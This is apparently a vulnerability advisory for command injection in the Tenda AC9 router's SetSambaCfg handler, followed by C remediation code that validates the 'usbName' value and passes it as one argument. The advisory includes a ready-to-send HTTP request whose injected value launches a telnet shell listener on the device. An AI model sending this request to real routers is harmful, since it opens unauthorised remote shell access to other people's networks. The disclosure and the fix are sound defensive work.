Vendor | Tenda |
---|---|
Product | Tenda ac9 router |
Hardware Version | V1.0 |
Firmware Version | V15.03.05.19 |
https://www.tenda.com.cn/material/show/102682
The Tenda ac9 V1.0 router running firmware V15.03.05.19 has a command injection vulnerability in the route /goform/SetSambaCfg, which may lead to remote arbitrary code execution.
In formSetSamba, the backend handler for the route /goform/SetSambaCfg, the HTTP POST request parameters "action" and "usbName" are read through the function sub_2B9D4. When "action" is "del", the value of "usbName" is interpolated into a format string passed to doSystemCmd and then executed, with no filtering of the value. Attackers can construct malicious "action" and "usbName" parameters to achieve remote code execution.
```
POST /goform/SetSambaCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 47
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi_wps.html?random=0.5358142303799198&
Accept-Encoding: gzip, deflate, br
Cookie: password=5f4dcc3b5aa765d61d8327deb882cf99isqtgb
Connection: keep-alive

action=del&usbName=1;telnetd -l /bin/sh -p 7890
```
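The fix for this class of bug is to validate usbName against an allowlist and pass it as a single argv element instead of formatting it into a shell command line. The following is an added example, not code from the Tenda firmware or from this advisory; the function names, the 32-character limit and the helper path are assumptions, since the page does not show the actual command string.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define USB_NAME_MAX 32                        /* assumed limit, not from the firmware */
#define DEL_HELPER "/usr/sbin/usb_del_helper"  /* hypothetical helper path */

/* Allowlist check: 1..USB_NAME_MAX characters from [A-Za-z0-9_-], no leading '-'
 * (a leading '-' would be parsed as an option by the helper). */
int usb_name_is_safe(const char *name)
{
    size_t len;
    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > USB_NAME_MAX || name[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        char c = name[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '_' || c == '-';
        if (!ok)
            return 0;
    }
    return 1;
}

/* Fills argv for execv() so usbName is one argument and is never shell-parsed.
 * Returns 0 on success, -1 if the request is not a valid "del" request. */
int build_del_argv(const char *action, const char *usb_name, const char *argv[3])
{
    if (action == NULL || strcmp(action, "del") != 0 || !usb_name_is_safe(usb_name))
        return -1;
    argv[0] = DEL_HELPER;
    argv[1] = usb_name;
    argv[2] = NULL;
    return 0;
}

int main(void)
{
    /* Constructed inputs: a plain name and the usbName value from the request above. */
    const char *samples[] = { "sda1", "1;telnetd -l /bin/sh -p 7890" };
    const char *argv[3];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-32s -> %s\n", samples[i],
               build_del_argv("del", samples[i], argv) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The caller would hand the filled argv to fork/execv rather than to a system()-style wrapper, so even a value that slipped past validation would not be interpreted by a shell.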